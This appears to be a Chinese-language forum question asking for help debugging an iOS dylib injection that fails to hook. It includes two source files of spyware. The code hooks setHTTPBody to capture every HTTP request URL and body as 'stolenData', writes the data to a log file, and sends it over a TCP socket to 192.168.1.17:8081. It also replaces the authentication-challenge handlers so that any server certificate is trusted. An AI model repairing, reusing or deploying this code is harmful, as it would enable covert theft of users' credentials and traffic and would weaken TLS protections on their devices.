当我们测试hook时,可以将dylib注入到系统中,但是我们要hook的系统函数却不起作用。我们在dylib中写了日志来跟踪,似乎class_replaceMethod代码和substrate lib都不起作用。我们没有将 Info.plist 文件复制到 iphone 文件夹以进行挂钩。
我在这里附上了这两种方法的代码。你能帮助我们吗?
//////injection.m
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <UIKit/UIKit.h>
void didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
{
[ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
}
[ challenge.sender continueWithoutCredentialForAuthenticationChallenge: challenge ];
}
BOOL canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
if ( [ [ protectionSpace authenticationMethod ] isEqualToString: NSURLAuthenticationMethodServerTrust ])
{
return YES;
}
}
IMP __mutableURLRequestIMP;
IMP __URLRequestIMP;
IMP __UIWindowSendEventIMP;
void setMutableHTTPBody(id self, SEL op, NSData *data)
{
mkdir("/usr/lib/iloginjection1", 777);
NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];
//sendInterceptedData(stolenData);
(__mutableURLRequestIMP)(self, op, data);
}
void setUIWindowSendEvent(id self, SEL op, UIEvent *event)
{
mkdir("/usr/lib/iloginjection2", 777);
//NSURLRequest *theRequest = (NSURLRequest *)self;
//NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n",
// [theRequest.URL absoluteString], [data bytes]];
//sendInterceptedData(stolenData);
(__UIWindowSendEventIMP)(self, op, event);
}
static void __attribute__((constructor)) initialize(void)
{
NSLog(@"initialize鈥︹€︹€?");
mkdir("/usr/lib/iloginjection", 777);
__UIWindowSendEventIMP = class_replaceMethod(objc_getClass("UIWindow"), sel_registerName("sendEvent:"), setUIWindowSendEvent, "@:@");
__mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setMutableHTTPBody, "@:@");
//__URLRequestIMP = class_replaceMethod(objc_getClass("NSURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");
}
/////////////////////////////////////////////////////////////////////////////
HookDemoInitialize.mm
////////////////////////////////////////////////////////////////////////////
#import "substrate.h"
#import "MessagesHook.h"
#include <Foundation/Foundation.h>
#include <objc/objc.h>
#include <objc/runtime.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <string>
#define HOST "192.168.1.17"
#define PORT 8081
IMP __mutableURLRequestIMP;
extern "C"
{
extern IMP original_setHTTPBody;
//extern void replace_setHTTPBody(UIWindow *self, SEL cmd, UIEvent *event);
}
void sendInterceptedData(NSString* stolenData)
{
char *buf = strdup([stolenData UTF8String]);
struct sockaddr_in addr;
size_t nr = strlen(buf) + 1;
int nw;
int addr_len;
int yes = 1;
int r, wfd;
off_t off;
wfd = socket(AF_INET, SOCK_STREAM, 0);
memset(&addr, 0, sizeof(struct sockaddr_in));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(HOST);
addr.sin_port = htons(PORT);
addr_len = sizeof(struct sockaddr_in);
r = connect(wfd, (struct sockaddr*)& addr, addr_len);
if(r < 0)
{
close(wfd);
free(buf);
return;
}
setsockopt(wfd, SOL_SOCKET, TCP_NODELAY, &yes, sizeof(int));
for(off = 0; nr; nr -= nw, off += nw)
{
if((nw = send(wfd, buf + off, (size_t)nr, 0)) < 0)
{
close(wfd);
free(buf);
return;
}
}
free(buf);
close(wfd);
}
extern "C" void replace_setHTTPBody(id self, SEL op, NSData *data)
{
NSLog(@"replace_setHTTPBody is call In Hook2");
NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];
mkdir("/usr/lib/ilog", 777);
int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
char *buf = strdup([stolenData UTF8String]);
size_t nr = strlen(buf) + 1;
write(fd, buf, nr);
close(fd);
sendInterceptedData(stolenData);
original_setHTTPBody(self, op, data);
}
void setHTTPBody(id self, SEL op, NSData *data)
{
NSMutableURLRequest *theRequest = (NSMutableURLRequest *)self;
NSString *stolenData = [NSString stringWithFormat:@"%@ = > %s\n", [theRequest.URL absoluteString], [data bytes]];
sendInterceptedData(stolenData);
(__mutableURLRequestIMP)(self, op, data);
}
void (*original_didReceiveAuthenticationChallenge)(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge);
void replaced_didReceiveAuthenticationChallenge(id self, SEL op, NSURLConnection *connection, NSURLAuthenticationChallenge *challenge)
{
NSLog(@"\n*********************replaced_didReceiveAuthenticationChallenge");
if ( [ challenge.protectionSpace.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust ])
{
[ challenge.sender useCredential: [ NSURLCredential credentialForTrust: challenge.protectionSpace.serverTrust] forAuthenticationChallenge: challenge];
}
int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
std::string buf = "\n*********************replaced_didReceiveAuthenticationChallenge\n";
write(fd, buf.c_str(), buf.length());
close(fd);
[ challenge.sender continueWithoutCredentialForAuthenticationChallenge:challenge ];
}
BOOL (*original_canAuthenticateAgainstProtectionSpace)(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace);
BOOL replaced_canAuthenticateAgainstProtectionSpace(id self, SEL op, NSURLConnection *connection, NSURLProtectionSpace *protectionSpace)
{
NSLog(@"\n*********************replaced_canAuthenticateAgainstProtectionSpace");
int fd = open("/usr/lib/ilog/hw.log", O_CREAT | O_RDWR | O_APPEND);
std::string buf = "\n*********************replaced_canAuthenticateAgainstProtectionSpace\n";
write(fd, buf.c_str(), buf.length());
close(fd);
// if ( [ [ protectionSpace authenticationMethod ]
// isEqualToString: NSURLAuthenticationMethodServerTrust ])
// {
return NO;
//}
}
extern "C" void HookDemoInitialize()
{
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
NSLog(@"HookDemoInitialize is call In Hook2");
mkdir("/usr/lib/ilog", 777);
MSHookMessageEx([UIWindow class], @selector(sendEvent:), (IMP)replace_UIWindow_sendEvent, (IMP *)&original_UIWindow_sendEvent);
//__mutableURLRequestIMP = class_replaceMethod(objc_getClass("NSMutableURLRequest"), sel_registerName("SetHTTPBody:"), setHTTPBody, "@:@");
//MSHookMessageEx([NSMutableURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);
MSHookMessageEx([NSURLRequest class], @selector(SetHTTPBody:), (IMP)replace_setHTTPBody, (IMP *)&original_setHTTPBody);
MSHookMessageEx([NSURLConnection class], @selector(didReceiveAuthenticationChallenge:), (IMP)replaced_didReceiveAuthenticationChallenge,(IMP *)&original_didReceiveAuthenticationChallenge);
MSHookMessageEx([NSURLConnection class], @selector(canAuthenticateAgainstProtectionSpace:), (IMP)replaced_canAuthenticateAgainstProtectionSpace,(IMP *)&original_canAuthenticateAgainstProtectionSpace);
[pool release];
}